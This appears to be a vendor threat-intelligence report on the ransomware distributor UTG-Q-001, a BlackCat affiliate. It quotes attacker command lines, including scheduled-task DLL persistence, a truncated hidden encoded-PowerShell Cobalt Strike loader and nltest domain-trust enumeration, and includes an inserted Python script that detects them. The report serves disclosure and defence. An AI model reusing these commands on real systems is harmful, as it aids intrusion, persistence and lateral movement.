Overview
The QiAnXin Threat Intelligence Center has been monitoring numerous ransomware distributors. In April of this year, we disclosed in detail the activities of the operators behind the Conti and Quantum ransomware, known as the Karakurt Group [1], targeting OT units in China. After the report was released, the group's activity within the country dropped sharply, but it continued to exploit an Exchange vulnerability to infiltrate some financial companies and move laterally. We have issued corresponding notifications to the affected clients.
Recently, we observed BlackCat publishing data belonging to a local petrochemical development company in Taiwan on the dark web. Ransomware attacks targeting OT units are escalating. Taking this opportunity, we are publicly disclosing a ransomware distributor that we have tracked internally, which we name UTG-Q-001. This group targets subsidiaries of OT units in Hong Kong, Macau, and Southeast Asia.
During subsequent tracking, we found overlaps between UTG-Q-001 and a report released by the overseas vendor Trend Micro [2]. Because we notified our clients early and assisted with the investigation, we did not observe ransomware being deployed. According to Trend Micro's report, UTG-Q-001 is confirmed to be one of the many operators of the BlackCat ransomware; however, we do not rule out the possibility that this group will deliver other ransomware families in the future. Competition among ransomware families for distributors is intensifying, with some distributors now able to keep 85% of the ransom [3].
Technical Details
In a client's internal network, we initially observed the attackers dropping a SystemBC-family backdoor named svc.dll and creating a scheduled task to load it with rundll32. It was detected and removed by the QiAnXin TianRan system. Because the SystemBC family is generally used together with ransomware groups, we immediately launched an investigation.
| Cmd |
|---|
| cmd.exe /C schtasks /create /ru SYSTEM /sc ONSTART /tn Update /tr "cmd /c rundll32 C:\users\public\music\svc.dll, rundll |
| cmd.exe /C schtasks /run /TN Update |
During the investigation, we found that the attackers invoked msiexec to launch an installer.
| Cmd |
|---|
| cmd.exe /C C:\Users\Public\Music\setup.msi |
Setup.msi installs the legitimate AteraAgent remote-management tool on the victim machine; the controlling account was Margaret.Gibson92@proton.me. The use of AnyDesk was also observed on other machines in the internal network.
The attackers then used wmic to execute PowerShell commands on other machines in the internal network, loading Cobalt Strike Beacon into memory. This activity was detected by the QiAnXin TianYan system.
| Cmd |
|---|
| cmd.exe /b /c start /b /min powershell -nop -w hidden -encodedcommand JABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAEMAbwBuAHYAZQ…. |
The Cobalt Strike beacons carried the watermarks 587247372 and 674054486 and executed commands to enumerate the current domain. Tools such as socat and NetCat were used for internal network scanning.
| Cmd |
|---|
| powershell -nop -exec bypass -EncodedCommand bgBsAHQAZQBzAHQAIAAvAGQAbwBtAGEAaQBuAF8AdAByAHUAcwB0AHMAIAAvAGEAbABsAF8AdAByAHUAcwB0AHMA |
| nltest /dclist: |
| nltest /domain_trusts /all_trusts |
| net1 user XXX XXXX |
| ping AD-XXXXX.com |
| netstat -ano |
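The command lines above share a few traits a detection rule can key on: a scheduled task whose action is rundll32 loading a DLL from C:\Users\Public, an MSI launched from the same world-writable directory, and PowerShell -EncodedCommand payloads that decode (base64 over UTF-16LE) to domain-trust enumeration with nltest. The following is an added example, not QiAnXin's detection logic, that classifies constructed process-creation command lines modelled on this report; the tag names and the sample lines are assumptions.

```python
import base64
import re

# Constructed sample command lines modelled on the report's tables (not real telemetry).
SAMPLE_CMDLINES = [
    'cmd.exe /C schtasks /create /ru SYSTEM /sc ONSTART /tn Update '
    '/tr "cmd /c rundll32 C:\\users\\public\\music\\svc.dll, rundll"',
    'cmd.exe /C C:\\Users\\Public\\Music\\setup.msi',
    'powershell -nop -exec bypass -EncodedCommand '
    'bgBsAHQAZQBzAHQAIAAvAGQAbwBtAGEAaQBuAF8AdAByAHUAcwB0AHMAIAAvAGEAbABsAF8AdAByAHUAcwB0AHMA',
    'notepad.exe C:\\Users\\alice\\notes.txt',
]

# PowerShell accepts abbreviated forms of -EncodedCommand; match the longest alternative first.
ENC_RE = re.compile(r'-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]+)', re.IGNORECASE)
PUBLIC_DIR_RE = re.compile(r'c:\\users\\public\\', re.IGNORECASE)


def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand payload (base64 of UTF-16LE), or None."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode('utf-16-le')
    except (ValueError, UnicodeDecodeError):
        return None


def classify(cmdline):
    """Return detection tags (hypothetical names) for one process command line."""
    tags = []
    lowered = cmdline.lower()
    decoded = decode_encoded_command(cmdline)
    # Evaluate enumeration patterns against the decoded payload as well as the raw line.
    effective = lowered + ' ' + (decoded.lower() if decoded else '')
    if 'schtasks' in lowered and '/create' in lowered and 'rundll32' in lowered:
        tags.append('schtasks_rundll32_persistence')
    if PUBLIC_DIR_RE.search(cmdline) and re.search(r'\.(dll|msi|exe)\b', lowered):
        tags.append('payload_in_users_public')
    if decoded is not None:
        tags.append('powershell_encoded_command')
    if re.search(r'\bnltest\b.*(/dclist|/domain_trusts)', effective):
        tags.append('domain_trust_enumeration')
    return tags


def scan(cmdlines):
    """Map each flagged command line to its tags; clean lines are omitted."""
    return {line: classify(line) for line in cmdlines if classify(line)}
```

Running scan(SAMPLE_CMDLINES) flags the first three lines and leaves the notepad line untagged; the encoded PowerShell line is reported both for encoding and for the nltest trust enumeration it hides.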
QiAnXin TianYan observed the attackers using a domain management account to transfer trojans and tools to other machines via SMB.
An attempt to laterally move to one of the servers triggered an alert from the QiAnXin Jiaotu product.
Our tracing indicates that the initial entry point was an IT staff member downloading a repackaged installer from a fake software-tool website attributed to UTG-Q-001, which brought the trojan into the corporate intranet. The attackers then used Mimikatz on that machine to capture the domain administrator's password and began lateral movement.
In another UTG-Q-001 incident, the attackers used an N-day vulnerability as the entry point to infiltrate a subsidiary of a manufacturing company in Southeast Asia. They attempted to spread a Cobalt Strike (CS) trojan across the entire internal network using the EternalBlue vulnerability, but this was intercepted by the QiAnXin Liuhé engine.
Conclusion
Currently, all products from the QiAnXin Threat Intelligence Center, including the QiAnXin Threat Intelligence Platform (TIP), TianQing, TianYan Advanced Threat Detection System, QiAnXin NGSOC, and QiAnXin Situational Awareness, support precise detection of such attacks.
IOC
MD5:
CC:
Reference Links
[1] https://mp.weixin.qq.com/s/E2X_QqbkZ6kbsgmGZ108Tg
[2] https://www.trendmicro.com/en_my/research/23/f/malvertising-used-as-entry-vector-for-blackcat-actors-also-lever.html#:~:text=Malvertising%20Used%20as%20Entry%20Vector%20for%20BlackCat%2C%20Actors%20Also%20Leverage
[3] https://www.group-ib.com/blog/qilin-ransomware/